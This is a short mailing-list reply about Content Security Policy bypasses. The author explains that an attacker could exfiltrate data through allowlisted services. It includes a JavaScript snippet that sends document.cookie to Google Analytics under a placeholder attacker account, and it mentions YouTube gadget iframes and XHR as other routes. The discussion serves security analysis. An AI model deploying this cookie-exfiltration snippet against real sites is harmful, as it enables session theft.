Re: CSP and jsonp callbacks

It's an example :P

but ok, let's say the attacker uses:

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-evil-1']);
  _gaq.push(['_trackPageview']);
  _gaq.push(['_trackEvent', 'cookies', 'add', document.cookie]);

And uses google analytics to send data back to the attacker.

Or let's say the attacker iframes youtube.com and loads a payload
inside a gadget in youtube.

Or let's say the attacker does the attack directly with XHR.

-- Eduardo